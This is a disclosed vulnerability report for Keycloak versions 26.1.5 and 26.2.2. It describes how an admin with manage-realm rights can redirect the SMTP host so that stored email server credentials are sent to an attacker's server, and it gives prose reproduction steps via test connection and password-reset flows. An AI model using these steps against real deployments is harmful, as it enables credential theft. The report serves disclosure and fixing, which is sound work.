Description
Before reporting an issue
- I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.
Area
admin/api
Describe the bug
The email server configuration has a security vulnerability that allows credential harvesting. An attacker with manage-realm permissions can modify the host/port configuration without needing to re-enter or know the existing email server credentials. The credentials can be harvested either through using the test connection functionality or by triggering any email-sending workflow, causing Keycloak to attempt authentication to an attacker-controlled server.
Attack scenarios:
-
Using test connection:
- Attacker gains access to an account with manage-realm permissions
- Attacker modifies email server host/port to point to their controlled server
- Attacker uses the test connection functionality
- Keycloak connects to the attacker's server using stored credentials
-
Using email-sending workflows:
- Attacker gains access to an account with manage-realm permissions
- Attacker modifies email server host/port to point to their controlled server
- Attacker triggers any functionality that sends emails (e.g., password reset)
- Keycloak connects to the attacker's server using stored credentials
In both scenarios, the attacker can capture the authentication attempt and harvest the email server credentials.
Version
26.1.5
Regression
- The issue is a regression
Expected behavior
When modifying email server connection parameters (host/port):
- System should require the external service credentials to be re-entered
- Changing parts of the configuration should invalidate the stored credentials
- Users should not be able to reuse stored credentials with modified connection parameters
Actual behavior
When modifying email server host/port:
- Previously stored credentials remain valid and usable
- No requirement to re-enter external service credentials
- Both test connection and email-sending functionalities will send credentials to the modified host
- Credentials can be captured by controlling the target server
- Despite UI and API properly obfuscating credentials in responses, the actual SMTP connection still uses the stored credentials
How to Reproduce?
Method 1 (Test Connection):
- Configure email server with valid credentials in Keycloak
- Using manage-realm permissions, modify only the host/port settings to point to a different server
- Use the test connection functionality
- Observe that Keycloak attempts to authenticate to the new host using the stored credentials
Method 2 (Email Workflow):
- Configure email server with valid credentials in Keycloak
- Using manage-realm permissions, modify only the host/port settings to point to a different server
- Save the configuration
- Trigger any email-sending functionality (e.g., use "Forgot Password" flow)
- Observe that Keycloak attempts to authenticate to the new host using the stored credentials
Anything else?
- This issue was initially reported through security channels and has been cleared for public disclosure
- Issue has also been verified in version 26.2.2
- This vulnerability could lead to compromise of email server credentials
- The attack requires manage-realm permissions, but could be part of a privilege escalation chain
- Multiple functionalities can be used to exploit this issue:
- Test connection functionality
- Forgot Password flow
- Email verification
- Any other workflow that sends emails
- While the UI and API properly handle credential obfuscation in their responses, this doesn't prevent the actual credential exposure during SMTP connection attempts